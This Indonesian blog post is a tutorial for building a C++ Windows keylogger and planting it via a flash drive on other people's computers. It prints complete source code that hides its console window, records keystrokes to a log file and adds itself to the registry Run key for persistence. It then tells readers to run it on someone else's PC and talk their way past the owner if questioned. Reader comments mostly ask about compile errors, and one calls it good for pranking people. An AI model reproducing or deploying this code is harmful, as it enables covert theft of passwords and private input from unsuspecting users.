-->

K.E ^_~ Yang lagi galau ini penawarnya link

Membuat keylogger di flashdisk

Keylogger merupakan sebuah perangkat komputer baik perangkat keras atau perangkat lunak yang digunakan untuk memantau penekanan tombol keyboard. Sebuah keylogger biasanya akan menyimpan hasil pemantauan penekanan tombol keyboard tersebut ke dalam sebuah berkas log/catatan/rekaman. Beberapa keylogger tertentu bahkan dapat mengirimkan hasil rekamannya ke e-mail tertentu secara periodik (wikipedia). Kalimat mudahnya keylogger adalah sebuah program yang dapat mencuri data akun (username, password) dengan cara merekam penekanan tombol pada keyboard.

Keylogger yang hendak kita buat menggunakan bahasa pemrograman C++, bagi agan yang belum paham apa itu C++ silahkan gugling, pelajari sendiri ya, jangan malas buat searching, reading n experiment. :P

langsung ja deh.,...ni POCny man teman....

• Pertama nte harus menyediakan flash disk ato USB (yang g jorok atau bebas virus ya, biar kompu orang g rusak).
• Lalu nte mesti download compiler C++. Bisa agan download di sini
• Setelah di install, open dan tulis code ini #copas juga buleh :P

#include 
#include 
#include 

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
    HWND stealth;
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);
 
    int test,create;
    test=test_key();
        
    if (test==2)
    {
        char *path="c:\\%windir%\\Log.exe";
        create=create_key(path);
          
    }
        
 
    int t=get_keys();
    
    return t;
}  

int get_keys(void)
{
            short character;
              while(1)
{
                    
    for(character=8;character<=222;character++)
{
    if(GetAsyncKeyState(character)==-32767)
{  
                            
     FILE *file;
    file=fopen("log.log","a+");
if(file==NULL)
{
return 1;
}            
if(file!=NULL)
{        
if((character>=39)&&(character<=64))
{
    fputc(character,file);
    fclose(file);
    break;
}        
    else if((character>64)&&(character<91))
{
                                           character+=32;
                                           fputc(character,file);
                                           fclose(file);
                                           break;
}
    else
{
    switch(character)
{
                                               case VK_SPACE:
                                               fputc(' ',file);
                                               fclose(file);
                                               break;    
                                               case VK_SHIFT:
                                               fputs("[SHIFT]",file);
                                               fclose(file);
                                               break;                                            
                                               case VK_RETURN:
                                               fputs("\n[ENTER]",file);
                                               fclose(file);
                                               break;
                                               case VK_BACK:
                                               fputs("[BACKSPACE]",file);
                                               fclose(file);
                                               break;
                                               case VK_TAB:
                                               fputs("[TAB]",file);
                                               fclose(file);
                                               break;
                                               case VK_CONTROL:
                                               fputs("[CTRL]",file);
                                               fclose(file);
                                               break;    
                                               case VK_DELETE:
                                               fputs("[DEL]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_1:
                                               fputs("[;:]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_2:
                                               fputs("[/?]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_3:
                                               fputs("[`~]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_4:
                                               fputs("[ [{ ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_5:
                                               fputs("[\\|]",file);
                                               fclose(file);
                                               break;                                
                                               case VK_OEM_6:
                                               fputs("[ ]} ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_7:
                                               fputs("['\"]",file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD0:
                                               fputc('0',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD1:
                                               fputc('1',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD2:
                                               fputc('2',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD3:
                                               fputc('3',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD4:
                                               fputc('4',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD5:
                                               fputc('5',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD6:
                                               fputc('6',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD7:
                                               fputc('7',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD8:
                                               fputc('8',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD9:
                                               fputc('9',file);
                                               fclose(file);
                                               break;
                                               case VK_CAPITAL:
                                               fputs("[CAPS LOCK]",file);
                                               fclose(file);
                                               break;
                                               default:
                                               fclose(file);
                                               break;
                                        }        
                                   }    
                              }        
                    }    
                }                  
                    
            }
            return EXIT_SUCCESS;                            
}                                                

int test_key(void)
{
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;
    
    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {    
        check=1;
        return check;
    }        
          
    reg_key=RegQueryValueEx(hKey,"Log",NULL,NULL,(LPBYTE)path,&buf_length);
    
    if((reg_key!=0)||(buf_length>BUFSIZE))
        check=2;
    if(reg_key==0)
        check=0;
        
    RegCloseKey(hKey);
    return check;  
}
 
int create_key(char *path)
{  
        int reg_key,check;
        
        HKEY hkey;
        
        reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        if(reg_key==0)
        {
                RegSetValueEx((HKEY)hkey,"Log",0,REG_SZ,(BYTE *)path,strlen(path));
                check=0;
                return check;
        }
        if(reg_key!=0)
                check=1;
                
        return check;
}
 

• Nah, setelah itu nte Complie atau run, tapi enakan klik Rebuild All, bisa agan temukan di Execute>Rebuild All

• Nah berhubung program sudah jalan, wajib nte end process “Log.exe “nya di Windows Task Manager.Save program dengan nama “Log”.

• Sekarang, coba nte buka my document, pasti dah ada program nya “Log.exe” dan tempat hasil Log-an nya yang bernama “Log”

• Tetapi apabila anda ingin mengganti nama program nya menjadi nama yang anda ingin kan seperti contoh “Havizganteng”, bias anda ubah code nya di sini

char *path="c:\\%windir%\\Havizganteng.exe";

file=fopen("Havizganteng.log","a+");

reg_key=RegQueryValueEx(hKey,"Havizganteng",NULL,NULL,(LPBYTE)path,&buf_length);

RegSetValueEx((HKEY)hkey,"Havizganteng",0,REG_SZ,(BYTE *)path,strlen(path));

• Na, kan sudah menjadi folder, tinggal nte copy ke flash disk

• Selanjutnya, tinggal nte jalanin aja di kompu orang lain lewat flash disk nte, untuk menghentikan “Log.exe’ / Keylogger nya, bisa kalian end process di Windows Task Manager / ctrl+alt+delete

• Tetapi kalau yang punya kompu Tanya “ko flash disk nya g d lepas?”, na tinggal basa-basi da ama yang punya computer,, hehehehhehehehe


slese dah.,

Source:
Allah Swt,
armytheludher(Devilsc0de)

comment 20 komentar

  1. Berkunjung mencari ilmu yang bermanfaat, terima kasih sharingnya. Salam kenal yach

    BalasHapus
  2. yups, salam knal juga pasa, thanks kunjungnnya

    BalasHapus
  3. KURANG NGERTI GAN

    BalasHapus
  4. Nuwun Infona Mas.. Monggo Mampir di warung saya

    BalasHapus
  5. Gan koq ga bisa donlot :hammer:

    BalasHapus
  6. @anonim >> kan itu sourcenya dah ada gan, tinggal dicompile aja :)

    BalasHapus
  7. Halo, saya pernah lihat video cara mengakali keylogger di Http://youtube.com/watch?v=IJLjLCX2caE ,,,btw cara tsb bagus gak? bisa dipakaikah?
    Menurut saya sih lumayan... tapi bgm menurutmu kawan?
    Trims

    BalasHapus
  8. itu coding jalan g dengan borlan c++ gan
    mohon pncerahannya

    BalasHapus
  9. berarti flashdisk harus tetep nyangkut di kompi itu donk buat dapetin hasil'a..??
    terus aktifin'a gmn..??
    bgitu colok USB langsung otomatis pa manual..??

    BalasHapus
  10. ma'af gan punya saya mah gak bisa nih,,
    gagal di HWND stealth;di blok warna merah..
    mohon pencerahannya..
    nuhun..
    salam kenal..

    BalasHapus
  11. ma'af Gan,, percobaan saya mah gagal di HWND stealth; bi blok warna merah sama ada tanda x di pinggirnya pesanna undeclared ceunah,,
    mohon pencerahannya ahh..
    hatur nuhun..

    BalasHapus
  12. thanks nyott

    BalasHapus
  13. wah thank, brmnfaat bngt buat ngrjain orng hahahahahahahahahaha

    BalasHapus
  14. cara menggunakannya gimana ya? soalnya uda dibikin kok gg bisa ya???pusing aku

    BalasHapus
  15. gan mau nanya itu file jalan sendiri ato nggak?

    tlong balasnya ke email aku aja : himaludin@hotmail.co.id
    :D :D :D :D :D :D :D

    BalasHapus
  16. gan kok scriptnya susah di compile

    BalasHapus
  17. waktu di compile kog banyak yang warna merah scriptnya???

    BalasHapus
  18. sorry bro tapi lognya kan di pc ngk di flash jd percuma ditancep ap ngknya flash sama ja klo bwat net yang ada defrisx kan jg ilang it

    BalasHapus

Catatan:
Seluruh komentar yang masuk akan dimoderasi terlebih dahulu. Komentar yang berbau spam, kasar, menghina, seluruhnya yang bersifat menghancurkan bukan membangun tidak akan ditampilkan. Silahkan bertanya dan memberi pendapat dengan sopan dan sesuai aturan.

Anda diperbolehkan mempublikasikan ulang artikel ini, dengan syarat:
1. Mintalah izin dengan cara berkomentar di bawah artikel ini
2. Wajib menyertakan link ke artikel ini dan menyertakan nama penulis

 
© Klikedukasi 2008 - 2013 | Design by Panembahan Satyapradana | 170p3x